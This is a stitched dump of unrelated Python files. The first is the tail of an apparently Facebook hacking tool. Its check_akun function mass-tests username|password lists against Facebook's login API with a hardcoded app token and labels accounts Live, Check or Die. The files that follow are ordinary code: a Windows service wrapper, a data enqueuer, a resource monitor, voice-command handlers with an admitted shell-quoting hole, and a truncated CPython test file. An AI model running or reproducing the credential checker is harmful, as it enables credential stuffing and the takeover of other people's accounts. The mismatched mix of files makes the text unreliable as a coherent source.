raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
service.py
|
#
# This code is a modified version of the django_windows_tools/service.py
# file located at https://github.com/antoinemartin/django-windows-tools/
#
# FastCGI-to-WSGI bridge for files/pipes transport (not socket)
#
# Copyright (c) 2012 Openance SARL
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import win32serviceutil
import subprocess
import os
import os.path
import sys
import platform
import multiprocessing.forking
import logging
import ConfigParser
import ctypes
import traceback
import win32service
import win32event
import win32con
import win32file
from os.path import abspath, dirname
from multiprocessing import Process
from multiprocessing.util import get_logger
GenerateConsoleCtrlEvent = ctypes.windll.kernel32.GenerateConsoleCtrlEvent
old_get_preparation_data = multiprocessing.forking.get_preparation_data
# Monkey-patch the Windows Process implementation so that it does not
# mistake 'PythonService.exe' for a Python script
def new_get_preparation_data(name):
d = old_get_preparation_data(name)
if 'main_path' in d and d['main_path'].lower().endswith('.exe'):
del d['main_path']
return d
multiprocessing.forking.get_preparation_data = new_get_preparation_data
# Apply the same monkey patching to billiard, which is a fork of
# multiprocessing
try:
import billiard.forking as billiard_forking
billiard_old_get_preparation_data = billiard_forking.get_preparation_data
def billiard_new_get_preparation_data(name):
d = billiard_old_get_preparation_data(name)
if 'main_path' in d and d['main_path'].lower().endswith('.exe'):
d['main_path'] = '__main__.py'
return d
billiard_forking.get_preparation_data = billiard_new_get_preparation_data
except:
pass
def log(msg):
'''Log a message in the Event Viewer as an informational message'''
import servicemanager
servicemanager.LogInfoMsg(str(msg))
def error(msg):
'''Log a message in the Event Viewer as an error message'''
import servicemanager
servicemanager.LogErrorMsg(str(msg))
def initialize_logger(config):
class StdErrWrapper:
"""
Call wrapper for stderr
"""
def write(self, s):
get_logger().info(s)
import logging
logger = get_logger()
values = dict(
format='[%(levelname)s/%(processName)s] %(message)s',
filename=None,
level='INFO',
)
if config and config.has_section('log'):
for (name, value) in config.items('log'):
values[name] = value
if values['filename']:
formatter = logging.Formatter(values['format'])
handler = logging.FileHandler(values['filename'])
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(
getattr(logging, values['level'].upper(), logging.INFO)
)
sys.stderr = StdErrWrapper()
def start_command(config, args):
initialize_logger(config)
print('starting command: %s' % ' '.join(args))
get_logger().info("Starting command: %s" % " ".join(args))
try:
subprocess.call(args, shell=True)
except:
pass
def spawn_command(config, server_name):
'''
Spawn a command specified in a configuration file and return the process
object.
'''
args = []
args.append(config.get(server_name, 'command'))
args += config.get(server_name, 'parameters').split()
process = Process(target=start_command, args=(config, args,))
process.start()
log('Spawned %s' % ' '.join(args))
return process
def start_commands(config):
'''
Spawn all the commands specified in a configuration file and return an
array containing all the processes.
'''
processes = []
node_name = platform.node()
if config.has_section(node_name):
services = config.get(node_name, 'run')
else:
services = config.get('services', 'run')
for server_name in services.split():
processes.append(spawn_command(config, server_name))
return processes
def end_commands(processes):
'''
Terminate all the processes in the specified array.
'''
for process in processes:
process.terminate()
process.join()
def test_commands(base_path=None, timeout=10):
'''
Method to test the spawn and termination of commands present in the
configuration file.
'''
config = read_config(base_path)
initialize_logger(config)
processes = start_commands(config)
import time
time.sleep(timeout)
end_commands(processes)
def get_config_modification_handle(path=None):
'''Return a directory change notification handle on the configuration directory.
This handle is used to restart the IRMA child processes when the
configuration file in that directory changes.
'''
if not path:
path = dirname(abspath(__file__))
change_handle = win32file.FindFirstChangeNotification(
path,
0,
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE
)
return change_handle
def read_config(base_path=None, filename='service.ini'):
'''
Read the configuration file that describes the processes to spawn.
'''
if not base_path:
base_path = dirname(abspath(__file__))
config = ConfigParser.ConfigParser()
config.optionxform = str
path = os.path.join(base_path, filename)
log(path)
config.read(path)
return config
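# Illustrative layout of the service.ini consumed by read_config()/start_commands().
# Section and key names are taken from the lookups in this file; the concrete
# commands below are placeholders, not part of the original project:
#
#   [services]
#   run = frontend worker
#   clean = frontend.pid;worker.pid
#
#   [frontend]
#   command = python
#   parameters = manage.py run_frontend
#
#   [worker]
#   command = python
#   parameters = manage.py run_worker
#
#   [log]
#   filename = service.log
#   level = INFO
#   format = [%(levelname)s/%(processName)s] %(message)s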
class IRMAService(win32serviceutil.ServiceFramework):
"""NT Service."""
_svc_name_ = "irma-service"
_svc_display_name_ = "IRMA background Processes"
_svc_description_ = "Run the IRMA background Processes"
_config_filename = 'service.ini'
_base_path = dirname(abspath(__file__))
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
log('Initialization')
# create an event that SvcDoRun can wait on and SvcStop
# can set.
self.config = read_config(self._base_path, self._config_filename)
initialize_logger(self.config)
if self._base_path not in sys.path:
sys.path.append(self._base_path)
parent_path = dirname(self._base_path)
if parent_path not in sys.path:
sys.path.append(parent_path)
self.stop_event = win32event.CreateEvent(None, 0, 0, None)
def SvcDoRun(self):
self.ReportServiceStatus(win32service.SERVICE_START_PENDING)
log('starting')
self.ReportServiceStatus(win32service.SERVICE_RUNNING)
base_path = self._base_path
config_filename = self._config_filename
self.modification_handle = get_config_modification_handle(base_path)
config_filepath = os.path.join(base_path, config_filename)
self.configuration_mtime = os.stat(config_filepath).st_mtime
keep_running = True
do_start = True
while keep_running:
# do the actual start
if do_start:
self.start()
log('Started. Waiting for stop')
index = win32event.WaitForMultipleObjects(
[self.stop_event, self.modification_handle],
False, win32event.INFINITE)
if index == 0:
# The stop event has been signaled. Stop execution.
keep_running = False
else:
# re-initialise handle
win32file.FindNextChangeNotification(self.modification_handle)
base_path = self._base_path
config_filename = self._config_filename
config_filepath = os.path.join(base_path, config_filename)
new_mtime = os.stat(config_filepath).st_mtime
if new_mtime != self.configuration_mtime:
self.configuration_mtime = new_mtime
do_start = True
log('Restarting child processes as the configuration '
'has changed')
self.stop()
self.config = read_config(base_path, config_filename)
else:
do_start = False
win32file.FindCloseChangeNotification(self.modification_handle)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
log('Stopping')
# Do the actual stop
self.stop()
log('Stopped')
win32event.SetEvent(self.stop_event)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
def start(self):
self.processes = start_commands(self.config)
def stop(self):
if self.processes:
end_commands(self.processes)
self.processes = []
node_name = platform.node()
if self.config.has_section(node_name):
clean = self.config.get(node_name, 'clean')
else:
clean = self.config.get('services', 'clean')
if clean:
for file in clean.split(';'):
try:
os.remove(file)
except:
error("Error while removing {0}\n{1}"
"".format(file, traceback.format_exc()))
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'test':
test_commands()
else:
IRMAService._base_path = dirname(abspath(__file__))
win32serviceutil.HandleCommandLine(IRMAService)
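# Typical invocations (install/start/stop/remove are the standard sub-commands
# provided by pywin32's HandleCommandLine; 'test' is handled above and simply
# spawns the configured commands for a few seconds):
#
#   python service.py install
#   python service.py start
#   python service.py stop
#   python service.py remove
#   python service.py test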
|
Enqueuer.py
|
from __future__ import absolute_import
import threading
import time
from abc import abstractmethod
try:
import queue
except ImportError:
import Queue as queue
class SequenceEnqueuer(object):
"""Base class to enqueue inputs, borrowed from Keras.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` call should yield an infinite stream of data.
"""
@abstractmethod
def is_running(self):
raise NotImplementedError
@abstractmethod
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`).
"""
raise NotImplementedError
@abstractmethod
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator, borrowed from Keras, simplified to use only multi-threading
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
incremented by one for each worker.
"""
def __init__(self, generator,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
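# Minimal usage sketch (illustrative only; `my_generator` stands in for any
# generator that endlessly yields batches, and `process` is a placeholder consumer):
#
#   enqueuer = GeneratorEnqueuer(my_generator(), wait_time=0.05)
#   enqueuer.start(workers=2, max_queue_size=10)
#   for batch in enqueuer.get():
#       process(batch)      # consume batches; break out whenever done
#   enqueuer.stop()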
|
monitor.py
|
#!/usr/bin/env python
# Copyright (c) 2020-2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2 License
# The full license information can be found in LICENSE.txt
# in the root directory of this project.
"""
- App for Resource Monitoring.
- Collects system CPU/memory as well as AXON CPU/memory.
"""
import logging
import os
import queue
import threading
import time
import lydian.common.errors as errors
try:
import psutil
except errors.ModuleNotFoundError:
import lydian.utils.lpsutil as psutil
from lydian.apps.base import BaseApp, exposify
from lydian.recorder.record import ResourceRecord
log = logging.getLogger(__name__)
@exposify
class ResourceMonitor(BaseApp):
REPORT_INTERVAL = 2
def __init__(self, rqueue, interval=None, proc_name='runner'):
"""
A simple resource monitor that writes CPU / memory percentages
to wavefront at the requested interval.
"""
self._rqueue = rqueue # records queue to put records onto.
self._interval = interval or self.REPORT_INTERVAL
self._stop_switch = threading.Event()
self._stop_switch.set() # Stopped until started.
self._proc_name = proc_name
self._thread = None
def stopped(self):
return self._stop_switch.is_set()
def _run(self):
p = psutil.Process(os.getpid())
while not self._stop_switch.is_set():
sys_cpu_percent = round(psutil.cpu_percent(), 2)
sys_mem_percent = round(psutil.virtual_memory().percent, 2)
sys_net_conns = int(len(psutil.net_connections()))
lydian_cpu_percent = round(p.cpu_percent(), 2)
lydian_mem_percent = round(p.memory_percent(), 2)
lydian_net_conns = int(len(p.connections()))
rec = ResourceRecord(sys_cpu_percent, sys_mem_percent,
sys_net_conns,
lydian_cpu_percent, lydian_mem_percent,
lydian_net_conns)
try:
self._rqueue.put(rec, block=False, timeout=2)
except queue.Full:
log.error("Cann't put Resource record %r into the queue.",
rec)
time.sleep(self._interval)
def is_running(self):
"""
Returns True if resources are being monitored, else False.
"""
return self._thread and self._thread.is_alive()
def stop(self):
"""
Stops Resource Monitoring.
"""
self._stop_switch.set()
if self.is_running():
self._thread.join()
self._thread = None
log.info("Stopped resource monitoring.")
def start(self):
"""
Starts Resource monitoring (in a separate thread)
"""
self._stop_switch.clear()
if not self._thread:
self._thread = threading.Thread(target=self._run)
self._thread.setDaemon(True)
self._thread.start()
log.info("Started resource monitoring.")
|
custom_commands.py
|
from threading import Thread
import json
import logging
from silviux.config.keys.command import vocab
from ezmouse.run import run_ezmouse
from vim_server.server import VimServer
logger = logging.getLogger(__name__)
vim_server = VimServer()
#The custom commands config is for simple mappings of grammar to executor side effects,
#i.e. you want to map the spoken word 'special' to a bash command like ~/myspecialcommand.sh
#(a commented sketch of that shape follows the notes below).
#This file is messy in part because I created it by extracting out my worst code
#from the executor. But that's kind of the point: add sloppy one-off code here without breaking
#everything else.
#TODO pass the callbacks the parser's config, then you can replace the hardcoded vocab words
#ie you could add a 'windowjump' command to the config object then do config['vocab']['windowjump']
#tests currently rely on these vocab words not being changed
#custom_commands = {
#    'some_arbitrary_name': {
#        'grammar': [
#            'rhs of grammar rule',    #the rule will be _custom_command_some_arbitrary_name ::= rhs of grammar rule
#            'terminal1 terminal2',    #the rule will be _custom_command_some_arbitrary_name ::= terminal1 terminal2
#        ],
#        'handler': executor_callback,
#        'matcher': parser_callback,
#    }
#}
#The "handler" function gets passed the executor instance and the tokens/ast nodes from the parser's p_ function arguments
#The "matcher" function gets passed the parser instance and the tokens/ast nodes from the parser's p_ function arguments
def window_handler(executor, matches):
if matches[0] == 'windy':
if (len(matches) == 2):
executor.automator.mod_plus_key(['super'], str(matches[1]))
else:
executor.automator.raw_key('super')
executor.automator.raw_key('Down')
elif matches[0] == 'folly':
#gnome 3 is weird/janky about timing of some things
executor.automator.command('/usr/bin/xdotool key super+m && sleep 0.5 && /usr/bin/xdotool key Right key Right key Down')
elif matches[0] == 'cloudy':
# grave is the ~ key, asciitilde is something else
# executor.automator.command('/usr/bin/xdotool keydown Alt key asciitilde')
# executor.add_release('Alt')
return
elif matches[0] == 'caddy':
executor.automator.command('/usr/bin/xdotool keydown Alt key Tab')
executor.add_release('Alt')
elif matches[0] == 'jumpy':
executor.automator.command('/usr/bin/xdotool key Alt+grave')
elif matches[0] == 'moody':
executor.automator.mod_plus_key(['Alt'], 'Tab')
else:
logger.error('unknown value in window_handler')
custom_commands = {
'window': {
'grammar': [
'windy',
'windy _number',
'caddy',
'cloudy',
'jumpy',
'moody',
'folly'
],
'handler': window_handler
}
}
def tmux_handler(executor, matches):
if matches[1] == 'jumpy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key w')
elif matches[1] == 'moody':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key percent')
elif matches[1] == 'windy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key quotedbl')
elif matches[1] == 'cloudy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key bracketleft')
elif matches[1] == 'caddy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a Ctrl+a')
elif isinstance(matches[1], int):
executor.automator.command('/usr/bin/xdotool key Ctrl+a key ' + str(matches[1]))
else:
logger.error('bad token in tmux handler %s', matches)
custom_commands['tmux'] = {
'grammar': [
'timex jumpy',
'timex moody',
'timex windy',
'timex cloudy',
'timex caddy',
'timex _number'
],
'handler': tmux_handler
}
def mouse_handler(executor, matches):
# self.automator.command('/usr/bin/xdotool click 1')
# self.automator.command('/usr/bin/xdotool click 3')
# self.automator.command('/usr/bin/xdotool click --repeat 2 1')
Thread(target=run_ezmouse).start()
custom_commands['mouse'] = {
'grammar': [
'moose',
],
'handler': mouse_handler
}
#haha this code was simple before adding support for single-word register replacements and optimistic mode
#TODO needs a full rewrite. Problems:
#1. It handles both the 'reggie ANY' case and lone terminal tokens as register words; combining support for both in one function resulted in too many conditionals.
#2. The register-specific terminals should be declared elsewhere; having them here is confusing for no benefit and makes the whole custom command a leaky abstraction.
def vim_handler(executor, matches):
if len(matches) == 1:
register_name = matches[0].type
token = matches[0]
msg = ["call", "GetRegister", [register_name], -1]
register_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", register_value)
#set the undo attribute for optimistic mode; this must be done before any return because the parser creates new tokens each time
token.undo = {'key': True, 'len': len(register_value)}
if token.done: return
if register_value.find("NotFoundError:") == 0: return
for l in register_value:
#most characters can be looked up in the keys config, but not 'space', 'backslash' and a few others
if l == ' ':
l = 'space'
executor.automator.xdo('key ' + l)
if matches[0] == 'reggie':
if len(matches) == 2:
msg = ["call", "GetRegister", [matches[1].extra], -1]
register_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", register_value)
#set the undo attribute for optimistic mode; this must be done before any return because the parser creates new tokens each time
matches[1].undo = {'key': True, 'len': len(register_value)}
if matches[1].done: return
else:
#TODO matches[2] is either an ANY token or a match from _custom_command_vim_programming;
#a match from the custom command rule is a custom command AST node, so we have to drill way down to find the actual register word
if hasattr(matches[2], 'meta'):
msg = ["call", "SetRegister", [matches[2].meta[1][0].type], -1]
else:
msg = ["call", "SetRegister", [matches[2].extra], -1]
vim_server.send_and_get(json.dumps(msg))
vim_server.activate_window()
return
if register_value.find("NotFoundError:") == 0: return
#important! if a register holds a value like $what, bash treats it as an environment variable,
#so be careful: quotes, --, && etc. are a problem and have to be escaped
#TODO probably an easy fix by running the command with something other than os.system
executor.automator.command('/usr/bin/xdotool type "' + register_value + '"')
if matches[0] == 'mackey':
if len(matches) == 2:
if matches[1] == 'ANY':
macro_name = matches[1].extra
else:
macro_name = matches[1].meta[1][0].type
msg = ["call", "GetMacro", [macro_name], -1]
macro_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", macro_value)
if macro_value.find("NotFoundError:") == 0: return
val = json.dumps({"macro": macro_value})
executor.q.put(val)
else:
if matches[2] == 'ANY':
macro_name = matches[2].extra
else:
macro_name = matches[2].meta[1][0].type
msg = ["call", "SetMacro", [macro_name], -1]
vim_server.send_and_get(json.dumps(msg))
vim_server.activate_window()
return
if matches[0] == 'tennis':
#TODO this will break in programming mode
if len(matches) == 2:
msg = ["call", "GetScript", [matches[1].extra], -1]
script_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", script_value)
if script_value.find("NotFoundError:") == 0: return
executor.automator.command(script_value)
else:
msg = ["call", "SetScript", [matches[2].extra], -1]
vim_server.send_and_get(json.dumps(msg))
vim_server.activate_window()
return
#only optimistically execute when getting a register value
#all these conditionals go away if the vim grammars are split into their own custom_command
#and there is a way to add terminals. TODO if the handler were made optional, then adding
#a config with only a grammar would be one way... the token would be _custom_command_keyofconfig
def vim_matcher(parser, matches):
if len(matches) == 2 and matches[0] == 'reggie':
#set register
pass
elif len(matches) == 1:
#terminal
pass
else:
parser.can_optimistic_execute = False
custom_commands['vim'] = {
'grammar': [
'reggie ANY',
'reggie sun ANY',
'mackey ANY',
'mackey sun ANY',
'tennis ANY',
'tennis sun ANY',
],
'matcher': vim_matcher,
'handler': vim_handler
}
custom_commands['vim_programming'] = {
'grammar': [
'philly',
'queens',
'pittsburgh',
'seattle',
'washington',
'columbia',
'denver',
'miami',
'london',
'elephant',
'zebra',
'dolphin',
# rules can be defined recursively here, but the match is then a 'custom_command' AST node, not a simple token
# a likely better option would be to keep the register names above in a list and build this grammar up programmatically
# note that as written, 'reggie sun reggie sun mackey any' would parse into a single AST and the handler would
# try to set the 'reggie' register, because it's the 3rd match token
# a cleaner option would be a new custom_commands entry with just the single tokens and a no-op executor handler
# (see the commented sketch after this config)
# or, better yet, support for a new config that is a simple list of terminal tokens to be used within custom commands
# 'reggie sun ANY',
'reggie sun _custom_command_vim_programming',
'mackey _custom_command_vim_programming',
'mackey sun _custom_command_vim_programming',
'tennis _custom_command_vim_programming',
'tennis sun _custom_command_vim_programming',
],
'matcher': vim_matcher,
'handler': vim_handler
}
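#A hypothetical sketch of the "cleaner option" mentioned in the comments above: move the single
#register-word terminals out of 'vim_programming' into their own entry with a no-op executor
#handler (the entry name and handler name below are illustrative, not part of this config):
#
#def register_noop_handler(executor, matches):
#    #exists only so other rules can reference these terminals; nothing to execute
#    pass
#
#custom_commands['vim_registers'] = {
#    'grammar': [
#        'philly',
#        'queens',
#        'pittsburgh',
#    ],
#    'handler': register_noop_handler,
#}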
def nautilus_handler(executor, matches):
if matches[2] is None:
matches[2] = 1
for _ in range(matches[2]):
if matches[1] == vocab['left']:
executor.automator.mod_plus_key(['ctrl'], 'Prior')
elif matches[1] == vocab['right']:
executor.automator.mod_plus_key(['ctrl'], 'Next')
#TODO _repeat just matches a number, so we get no repeat functionality from the executor.
#Look in parser.py: r_repeat just returns a number, while r_motion returns repeat AST nodes.
#To use the executor's repeat ability we would have to somehow wrap the custom command AST node
#in a repeat node so the postorder_flat fn invokes our handler callback n times; not sure if that's desirable.
#It is simple enough to loop manually using the _repeat value in the handler, as done above.
custom_commands['nautilus'] = {
'grammar': [
"mango %s _repeat" % (vocab['left'],),
"mango %s _repeat" % (vocab['right'],),
],
'handler': nautilus_handler
}
def fkey_handler(executor, matches):
fkey = 'F' + ''.join([str(n) for n in matches[1:]])
executor.automator.raw_key(fkey)
custom_commands['fkey'] = {
'grammar': [
'floppy _number',
'floppy _number _number',
],
'handler': fkey_handler
}
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
